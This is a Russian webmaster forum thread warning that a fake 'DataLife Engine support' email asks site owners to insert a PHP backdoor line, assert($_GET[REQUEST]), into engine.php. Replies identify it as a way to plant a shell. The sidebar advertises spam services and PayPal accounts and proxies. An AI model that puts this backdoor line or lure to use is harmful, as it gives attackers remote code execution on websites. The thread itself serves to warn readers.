Ваш сайт подвержен взлому!

Сообщений: 511 Регистрация: Авг 2010

24 Октября 2014 20:47

В очередной раз на очередной сайт на DLE пришло письмо от support@dle-news.ru:

Цитата

Здравствуйте, уважаемый клиент!

Благодарим Вас за использование на Вашем сайте сайт.ru нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: сайт.ru/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);

С уважением,

Служба поддержки «DataLife Engine»

Это развод. Не ведитесь!

Порно онлайн!

naribalky

Сообщений: 3196 Регистрация: Апр 2011

24 Октября 2014 20:55

Mr. Awara, :confused:интересно

Mr. Awara

Сообщений: 511 Регистрация: Авг 2010

24 Октября 2014 21:04

я понимаю. что продвинутому мастеру итак будет понятно, но многие начинающие мастера пробуют строить свои сайты именно на DLE и не факт, что они не примут всерьез такого рода сообщения.

Изменено: Mr. Awara - 24 Октября 2014 21:05

Coder

Сообщений: 10610 Регистрация: Мар 2013

24 Октября 2014 21:08

Цитата
assert() проверит заданное утверждение assertion и совершит соответствующее действие, если результатом проверки окажется FALSE.

Да уж...

Цитата
Mr. Awara пишет: support@dle-news.ru

Указать можно что угодно - это ж php)

) Впрочем, я не профи...

✓ Проверенные скрипты и полезности для сайта

✓ Курсы

✓ Сервис временных ссылок

p.escobar

Сообщений: 309 Регистрация: Авг 2014

24 Октября 2014 21:33

Да, понял сорри ) ну да это бекдоры заставляют сделать чтобы шелл внедрить.
Как это печально

Изменено: p.escobar - 24 Октября 2014 21:36

Mr. Awara

Сообщений: 511 Регистрация: Авг 2010

24 Октября 2014 21:37

p.escobar, поверьте, ваше право.
а отправить письмо и указать чужой адрес вместо своего не думали, что можно?

Vemeriu Олег Немеренов

Сообщений: 839 Регистрация: Июн 2013

24 Октября 2014 21:55

Интересно однако, брут теперь не в моде что-ли.

p.escobar Сообщений: 309 Регистрация: Авг 2014	#8 24 Октября 2014 21:56 Да я исправил, просто не подумал. ))

Новые темы	Объявления	Свободное общение
08:26 Помогите! ОТКРЫЛАСЬ монетизация на ЮТЮБ! Но Как быть в 2024 с Adsense? 08:23 Rotapost прикрыли! Чем пользоваться? 17:53 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 22:27 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 12:39 2Index - быстрая индексация страниц сайта и обратных ссылок 06:17 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 11:46 SharkBoss - партнёрская программа для монетизации ЛЮБЫХ видов трафика (включая спам).	04:12 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 22:41 SOCKS5 приватные прокси на 30 дней для PayPal 22:41 Google Voice аккаунты для бесплатных SMS и звонков 22:40 PayPal аккаунты для любых целей 18:24 garantcoin.io - быстрый и надёжный сервис обмена криптовалюты GarantCoin 16:59 Сайты с зарубежным трафиком КУПЛЮ 16:50 №1 Рассылка / Инвайтинг [TELEGRAM] \| Приватный метод	13:08 Бесплатный майнинг Tether (USDT) 10:29 С юмором по жизни! 16:49 monetizer.agency – рекламная сеть для взрослого и развлекательного трафика. 100$ новому вебмастеру 20:43 Добро пожаловать в цифровой мир... 15:59 Про мясо 23:09 ПП от PMS remote.team - 200$ за команду 13:28 Компьютерная мышь

Новые темы

Объявления

Свободное общение

08:26 Помогите! ОТКРЫЛАСЬ монетизация на ЮТЮБ! Но Как быть в 2024 с Adsense?
08:23 Rotapost прикрыли! Чем пользоваться?
17:53 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу.
22:27 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options
12:39 2Index - быстрая индексация страниц сайта и обратных ссылок
06:17 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг
11:46 SharkBoss - партнёрская программа для монетизации ЛЮБЫХ видов трафика (включая спам).

04:12 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка
22:41 SOCKS5 приватные прокси на 30 дней для PayPal
22:41 Google Voice аккаунты для бесплатных SMS и звонков
22:40 PayPal аккаунты для любых целей
18:24 garantcoin.io - быстрый и надёжный сервис обмена криптовалюты GarantCoin
16:59 Сайты с зарубежным трафиком КУПЛЮ
16:50 №1 Рассылка / Инвайтинг [TELEGRAM] | Приватный метод

13:08 Бесплатный майнинг Tether (USDT)
10:29 С юмором по жизни!
16:49 monetizer.agency – рекламная сеть для взрослого и развлекательного трафика. 100$ новому вебмастеру
20:43 Добро пожаловать в цифровой мир...
15:59 Про мясо
23:09 ПП от PMS remote.team - 200$ за команду
13:28 Компьютерная мышь

09.10.2025 22:55	Ну что, кто куда деваете свои сайты?
05.02.2025 07:48	США готовят закон для уничтожения пиратских сайтов во всех странах мира
25.01.2025 14:45	(затёр сайт)
22.11.2024 09:05	Продвижение петиций на сайте change.org
29.06.2024 13:42	Роскомнадзору разрешили самостоятельно блокировать "зеркала" запрещенных сайтов